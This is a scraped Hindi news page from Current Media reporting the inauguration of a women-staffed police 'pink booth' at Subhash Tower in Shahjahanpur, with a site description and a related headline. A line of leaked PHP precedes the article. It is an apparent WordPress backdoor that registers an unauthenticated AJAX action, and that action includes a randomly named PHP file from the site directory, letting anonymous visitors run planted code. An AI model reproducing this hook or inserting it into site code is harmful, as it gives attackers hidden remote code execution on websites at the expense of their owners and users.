if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }पुलिस अधीक्षक ने सुभाष टावर (घण्टाघर) पर पिंक बूथ का किया उद्घाटन - Current Media

पुलिस अधीक्षक ने सुभाष टावर (घण्टाघर) पर पिंक बूथ का किया उद्घाटन

शाहजहाँपुर। मो0 आफाक। यूपी के शाहजहांपुर में पुलिस अधीक्षक ने थाना सदर बजार क्षेत्र स्थित सुभाष टावर (घण्टाघर) पर पिंक बूथ का उद्घाटन किया गया जहां केवल महिला पुलिसकर्मी तैनात रहेंगी। इसका उद्देश्य महिलाओं को त्वरित पुलिस सहायता प्रदान करना । पुलिस अधीक्षक ने बताया कि महिलाएं यहां न केवल सहायता प्राप्त कर सकती हैं, बल्कि यदि वे असुरक्षित महसूस करें, तो कुछ देर आराम भी कर सकती हैं।
कार्यक्रम के दौरान, महिलाओं को महिला हेल्पलाइन नंबर 1090, आपातकालीन सेवा 112, और अन्य हेल्पलाइन नंबरों के बारे में जानकारी दी गई। इसके साथ ही, मिशन शक्ति और साइबर क्राइम से जुड़ी जागरूकता अभियान की जानकारी भी साझा की गई।
यह पहल मिशन शक्ति के तहत की गई है, जिससे महिलाओं को बिना किसी झिझक के अपनी समस्याएं साझा करने का अवसर मिलेगा। इस मौके पर पुलिस अधीक्षक राजेश द्विवेदी, एसपी सिटी देवेन्द्र कुमार, सीओ सिटी पंकज पंत, थाना प्रभारी सदर बाजार, अरविंद सिंह चौहान, महिला थाना प्रभारी रश्मि अग्निहोत्री, अंजान चौकी प्रभारी रमेश कुमार वर्मा सहित अन्य अधिकारी व कर्मचारी मौजूद रहे ।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

शांतिपूर्ण माहौल में अदा हुई ईद-उल-अज़हा की नमाज

शाहजहांपुर। मो0आफाक । शाहजहांपुर में ईद-उल-अजहा का त्योहार गुरुवार को शांतिपूर्ण और सौहार्दपूर्ण माहौल में …